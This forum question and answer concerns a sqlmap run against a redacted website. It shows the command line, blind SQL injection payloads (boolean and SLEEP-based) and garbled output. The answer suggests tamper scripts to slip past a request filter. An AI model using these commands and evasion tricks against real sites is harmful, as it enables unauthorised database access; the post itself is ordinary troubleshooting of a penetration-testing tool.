Scrambled database name / unable to retrieve the number of databases with SQLMap

Question

I have the results for sqlmap:

./sqlmap.py -u "http://REDACTED/browse?destination_id=12"  --identify-waf --random-agent -v 3  --dbs

GET parameter 'destination_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:

---
Parameter: destination_id (GET)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: destination_id=12) AND 2321=2321 AND (9943=9943
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: destination_id=12) AND SLEEP(5) AND (4055=4055
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

But when getting database name results, everything is scrambled:

[10:26:50] [ERROR] unable to retrieve the number of databases
[10:26:50] [INFO] falling back to current database
[10:26:50] [INFO] fetching current database
[10:26:50] [INFO] resumed: \x11
[10:26:50] [DEBUG] performed 0 queries in 0.00 seconds
available databases [1]:
[*]

At available databases shows only a Square with 0011 in it.

What are your thoughts?

score 1 · Answer 1 · answered Sep 23 '16 at 09:45

1

I think your target has a request filter. Try typing --tamper between.py. You have to check what is filtered. between.py and equaltolike.py tampers may help.

answered Sep 23 '16 at 09:45

user124735

23
1

Scrambled database name / unable to retrieve the number of databases with SQLMap

1 Answers1